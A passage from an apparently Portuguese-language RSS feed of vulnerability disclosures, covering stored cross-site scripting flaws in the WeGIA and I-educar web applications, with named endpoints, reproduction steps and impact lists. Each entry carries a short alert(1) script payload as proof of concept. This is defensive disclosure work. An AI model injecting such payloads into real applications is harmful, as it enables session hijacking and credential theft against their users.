&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não higieniza ou codifica corretamente o campo &amp;#34;Nome&amp;#34;, que aceita entrada controlada pelo usuário. Um invasor pode inserir HTML ou JavaScript malicioso nesse campo ao criar ou editar um paciente.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Ao acessar a página “Informações Pacientes”, esse valor é renderizado no DOM sem o devido tratamento, o que leva à execução do código injetado no navegador.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Esse comportamento indica codificação de saída inadequada e resulta em uma vulnerabilidade XSS armazenada.&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;h1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;h1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;1.&amp;lt;/b&amp;gt; Cadastre um paciente onde o campo “Nome” contenha o código malicioso.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;2.&amp;lt;/b&amp;gt; Navegue até a página “Informações do Paciente” do paciente criado.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;3.&amp;lt;/b&amp;gt; Observe que o código malicioso é executado no navegador:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-40283/image.png&amp;#34;
	width=&amp;#34;1360&amp;#34;
	height=&amp;#34;737&amp;#34;
	srcset=&amp;#34;/p/cve-2026-40283/image_hu_7406d057c64135fd.png 480w, /p/cve-2026-40283/image_hu_47e3d68f29444a6d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;184&amp;#34;
		data-flex-basis=&amp;#34;442px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x74c-gwj9-6cwr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x74c-gwj9-6cwr&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/thiago50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Thiago Escarrone&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Apr 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-40284</title>
        <link>https://www.cvehunters.com/pt/p/cve-2026-40284/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2026-40284/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-40284-cross-site-scripting-xss-armazenado-em-novo-da-função-listar_despachosphp&amp;#34;&amp;gt;CVE-2026-40284: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;listar_despachos.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40284&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40284&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso através do campo “Destinatário”. O código malicioso é armazenado e executado posteriormente ao visualizar a página de despacho, afetando outros usuários.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue higienizar ou escapar corretamente o campo “Destinatário”, que é preenchido com dados controlados pelo usuário (nome do usuário). Quando um despacho é criado usando um nome malicioso contendo HTML/JavaScript, esse valor é armazenado no sistema.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Durante a renderização da página de listagem de despachos, o aplicativo insere esses dados no DOM usando .html(), fazendo com que o navegador interprete e execute o código injetado.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Isso resulta em uma vulnerabilidade de XSS armazenado devido à codificação de saída inadequada dos dados controlados pelo usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-40284-cross-site-scripting-xss-armazenado-em-novo-da-função-listar_despachosphp&amp;#34;&amp;gt;CVE-2026-40284: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;listar_despachos.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40284&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40284&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada permite que um usuário autenticado injete JavaScript malicioso através do campo “Destinatário”. O código malicioso é armazenado e executado posteriormente ao visualizar a página de despacho, afetando outros usuários.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue higienizar ou escapar corretamente o campo “Destinatário”, que é preenchido com dados controlados pelo usuário (nome do usuário). Quando um despacho é criado usando um nome malicioso contendo HTML/JavaScript, esse valor é armazenado no sistema.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Durante a renderização da página de listagem de despachos, o aplicativo insere esses dados no DOM usando .html(), fazendo com que o navegador interprete e execute o código injetado.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Isso resulta em uma vulnerabilidade de XSS armazenado devido à codificação de saída inadequada dos dados controlados pelo usuário.&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;listar_despachos.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;h1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;h1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;1.&amp;lt;/b&amp;gt; Altere o nome de um usuário (ou crie um) com o payload.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;2.&amp;lt;/b&amp;gt; Crie um despacho selecionando este usuário como “Destinatário”.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;3.&amp;lt;/b&amp;gt; Acesse a página que lista ou exibe o despacho.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;4.&amp;lt;/b&amp;gt; Observe que o payload é executado no navegador:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-40284/image.png&amp;#34;
	width=&amp;#34;884&amp;#34;
	height=&amp;#34;751&amp;#34;
	srcset=&amp;#34;/p/cve-2026-40284/image_hu_b5a29259f27a9224.png 480w, /p/cve-2026-40284/image_hu_d02bb8cf295854e3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;117&amp;#34;
		data-flex-basis=&amp;#34;282px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mccp-8446-phw5&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mccp-8446-phw5&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/thiago50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Thiago Escarrone&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Apr 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-4355</title>
        <link>https://www.cvehunters.com/pt/p/cve-2026-4355/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2026-4355/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-4355-cross-site-scripting-xss-armazenado-em-novo-da-função-educar_servidor_curso_lst-parâmetro-name&amp;#34;&amp;gt;CVE-2026-4355: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;educar_servidor_curso_lst&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-4355&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-4355&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p&amp;gt;##Resumo&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt; do aplicativo I-educar 2.11. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página `&amp;lt;code&amp;gt;CurricularComponent/view&amp;lt;/code&amp;gt;` é acessada pelos usuários, representando um risco de segurança significativo.
&amp;lt;p&amp;gt;##Detalhes&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-4355-cross-site-scripting-xss-armazenado-em-novo-da-função-educar_servidor_curso_lst-parâmetro-name&amp;#34;&amp;gt;CVE-2026-4355: Cross-Site Scripting (XSS) armazenado em Novo da função &amp;lt;code&amp;gt;educar_servidor_curso_lst&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-4355&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-4355&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p&amp;gt;##Resumo&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt; do aplicativo I-educar 2.11. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página `&amp;lt;code&amp;gt;CurricularComponent/view&amp;lt;/code&amp;gt;` é acessada pelos usuários, representando um risco de segurança significativo.
&amp;lt;p&amp;gt;##Detalhes&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-executar&amp;#34;&amp;gt;Passos para executar:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Registre o payload no campo `&amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;` no endpoint `&amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt;`.
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-4355/image.png&amp;#34;
	width=&amp;#34;1655&amp;#34;
	height=&amp;#34;336&amp;#34;
	srcset=&amp;#34;/p/cve-2026-4355/image_hu_f0d344b2348566d2.png 480w, /p/cve-2026-4355/image_hu_6c0417b053954c44.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;492&amp;#34;
		data-flex-basis=&amp;#34;1182px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Depois disso, o XSS pode ser acionado abrindo o endpoint `&amp;lt;code&amp;gt;educar_servidor_curso_lst.php&amp;lt;/code&amp;gt;` correspondente ao nome editado. ID.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-4355/image-1.png&amp;#34;
	width=&amp;#34;1655&amp;#34;
	height=&amp;#34;336&amp;#34;
	srcset=&amp;#34;/p/cve-2026-4355/image-1_hu_304eccbb94dee2b4.png 480w, /p/cve-2026-4355/image-1_hu_6a7e07ce80a625ac.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;492&amp;#34;
		data-flex-basis=&amp;#34;1182px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
